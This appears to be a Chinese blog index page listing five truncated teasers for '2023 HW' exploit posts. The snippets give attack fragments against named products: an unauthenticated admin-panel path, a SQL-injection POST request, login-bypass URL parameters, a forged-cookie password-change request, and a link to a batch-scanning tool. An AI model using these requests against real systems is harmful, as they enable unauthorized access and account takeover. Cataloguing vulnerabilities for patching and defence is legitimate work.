• 2023HW漏洞POC、EXP(第五弹)

    金盘图书馆微信管理后台getsysteminfo未授权访问漏洞POC:/admin/weichatcfg/getsysteminfo漏洞描述:北京金盘鹏图软件技术有限公司的金盘图书馆微信管理后台getsysteminfo存在未授权访问漏洞漏...

  • 2023HW漏洞POC、EXP(第四弹)

    锐捷交换机WEB管理系统EXCU_SHELL信息泄露漏洞描述:锐捷交换机WEB管理系统EXCU_SHELL信息泄露漏洞批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main...

  • 2023HW漏洞POC、EXP(第三弹)

    某和OAC6-GetSqlData.aspxSQL注入漏洞POCPOST/C6/Control/GetSqlData.aspx/.ashxHost:ip:portUser-Agent:Mozilla/5.0(WindowsNT5.1)App...

  • 2023HW漏洞POC、EXP(第二弹)

    汉得SRMtomcat.jsp登录绕过漏洞POC/tomcat.jsp?dataName=role_id&dataValue=1/tomcat.jsp?dataName=user_id&dataValue=1然后访问后台:/...

  • 2023HW漏洞POC、EXP(第一弹)

    某神SecSSL3600安全接入网关系统任意密码修改漏洞POCPOST/changepass.php?type=2Cookie:admin_id=1;gw_user_ticket=ffffffffffffffffffffffffffffff...